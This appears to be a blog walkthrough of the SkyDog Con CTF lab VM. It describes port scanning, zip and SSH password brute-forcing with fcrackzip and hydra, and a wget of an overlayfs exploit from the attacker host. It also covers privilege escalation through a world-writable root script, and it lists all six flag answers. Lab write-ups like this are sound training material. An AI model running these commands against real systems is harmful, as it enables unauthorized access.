SkyDog Con CTF – The Legend Begins

Over but not forgotten.

Goal of Sky Dog Con CTF

The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself.

Enumeration

nmap -p- -T4 -sV -v 192.168.2.18

nmap
Looks like there is a web server running and the SSH port is open.
Let ‘s start with the web server first.
Looking at the webpage of 192.168.2.18 there is only a picture of SkyDog. Would that be the first flag (A Picture is Worth a Thousand Words)? Saving the picture and checking EXIF.
exif
Looks like I found the first flag. On the the next one. When do Androids Learn to Walk? A reference to robots.txt?

dirb http://192.168.2.18

dirb
http://192.168.2.18/robots.txt >> flag{cd4f10fcba234f0e8b2f60a490c306e6}
Got flag number 2 and a whole list of directories to explore. May be hint number 3 gives direction? Who Can You Trust? After I run nikto the directory /Setec/ caught my attention.
It held a picture with the text ‘too many secrets’ from the movie ‘Sneakers’.
Off course: Setec Astronomy > too many secrets. This VM was made by a movie buff LOL.

Because there was another picture, I started with checking the EXIF data. Nothing. Then I thought, there are too many secrets……so let’s try steghide. After different unsuccessful attempts, I gave up on the picture and looked at the page itself. Inside the source there was a google tracking script. Not really useful. But there was an odd thing about the script itself. It looks like the scipt was signed by NSA agent Abbott AKA Darth Vader. Another movie reference, because James Earl Jones played NSA Agent Bernard Abbott in the movie Sneakers and he delivered the voice of Darth Vader. I’ve been so focussed on the picture itself, I hadn’t seen that the picture resided in the directory /Astronomy/. Inside this directory there was a zip file called Whistler.zip.
Having the wiki site of Sneakers still open, it was soon clear that the filename itself was another reference to the movie. Irwin “Whistler” Emery was a blind phone phreak.
Let’s unpack the zip file. Password protected. Bummer. Let’s try some words from the movie itself. No luck. Then it’s time for some brute force. Let’s load up the file in fcrackzip. I choose the rockyou wordlist and voila. Got the password.
Inside the zip file was the third flag (flag{1871a3c1da602bf471d3d76cc60cdb9b}) and a file called ‘QuesttoFindCosmo’.

QuesttoFindCosmo

The clue inside the textfile was ‘Time to break out those binoculars and start doing some OSINT’.
Because this CTF was filled with references from the movie ‘Sneakers’, I assumed this was another one. In the filename was the word Cosmo. After checking wiki again it was clear that Cosmo was a character from Sneakers played by Ben Kingsley. There were a few words that I could use in a Google search.

“Cosmo” AND “Ben Kingsley” AND “binoculars”

The result was a site with the movie script (http://www.thealmightyguru.com/Reviews/Sneakers/Docs/Sneakers-Script.txt). When looking for the word ‘binoculars’ there were 4 entries. One of them in a piece of text containing the words “binoculars, flag, Cosmo……and PlayTronics). This last word was important in the text. So hopefully it’s also important in finding the next flag.
I pulled the text from the movie script inside a list with:

cewl –write sneakers.lst -m 3 http://www.thealmightyguru.com/Reviews/Sneakers/Docs/Sneakers-Script.txt

Then sorted the list and removed doubles.

sort sneaker.lst | uniq

Last I run dirb with the new list.
dirb_sneaker
PlayTronics! Yes! Let’s check it out.
And we have another flag (flag{c07908a705c22922e6d416e0e1107d99}).

Wireshark

Next to the flag was also a pcap file with the filename: companytraffic.
Let’s fire up Wireshark and analyze the pcap file.
Inside the pcap file there is an audio file. After carving it out and playing it, it is another reference to the movie ‘Sneakers’. This time it’s the part where Werner Brandes identifies himself with the next phrase: “Hi, my name is Werner Brandes. My voice is my
passport. Verify me.”. But how does this help me with finding the next clue?
I’m stumped. I scoured the internet for a clue. I kept reading the script part concerning the audio message, but nothing. To avoid tunnelvision I started to look to other things. I went back to the hashes used by the flags and noticed they were md5 hashes. Why not check if they’re known passwords.
crackstation
The last recovered flag was ‘leroybrown’. Back to the movie script. It seems the name Leroy Brown comes up in the form of a song. Just before the part with the text from the carved file. Coincidence?

SSH

Hadn’t tried SSH because of the missing username/password.
leroy:brown
leroybrown:My voice is my passport. Verify me.
leroybrown:Hi, my name is Werner Brandes. My voice is my passport. Verify me.
And a whole lot of different combinations, but nothing.
Time for hydra. I made a word-list from the movie script and used it with hydra.

hydra -v -L wordlist.txt -P wordlist.txt 192.168.2.18 ssh

Finally! Let’s log in.
ssh

uname -a

uname

ls
cat flag.txt

flag{82ce8d8f5745ff6849fa7af1473c9b35}
Time for the final flag.
Looks like the machine runs on Ubuntu 14.04. Time to get root.
I’m going for the ‘overlayfs’ Local Root Exploit (https://www.exploit-db.com/exploits/39166/).

wget http://192.168.2.9/overlayfs.c
gcc overlayfs.c -o overlayfsThe program ‘gcc’ is currently not installed. To run ‘gcc’ please ask your administrator to install the package ‘gcc’

Crap! No gcc.
Let’s look around more.

cat /etc/passwd

etc-passwd
Looks like there is another user named ‘nemo’.

groups nemo

And ‘nemo’ is part of the sudo group.
To get root I need a file that gets run by root. So I’m going to look for world writable files.

find / -perm -0002 -type f -not -path “/proc*” -exec ls -la {} \; 2>/dev/null

find
sanitizer.py…..what does it do?

cat /lib/log/sanitizer.py

cat1
Looks like this script cleans up the tmp folder.
Let’s alter it to set the SUID part.
nano
root
I’m in the root group. Now let’s take a looksy in the root folder.
final_flag
flag{b70b205c96270be6ced772112e7dd03f}
To get the final piece……..

http://192.168.2.18/CongratulationsYouDidIt/

the_best

Flags

The six flags are in the form of flag{MD5 Hash} such as flag{1a79a4d60de6718e8e5b326e338ae533
Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
flag{abc40a2d4e023b42bd1ff04891549ae2}
Flag #2 When do Androids Learn to Walk?
flag{cd4f10fcba234f0e8b2f60a490c306e6}
Flag #3 Who Can You Trust?
flag{1871a3c1da602bf471d3d76cc60cdb9b}
Flag #4 Who Doesn’t Love a Good Cocktail Party?
flag{c07908a705c22922e6d416e0e1107d99}
Flag #5 Another Day at the Office
flag{82ce8d8f5745ff6849fa7af1473c9b35}
Flag #6 Little Black Box
flag{b70b205c96270be6ced772112e7dd03f}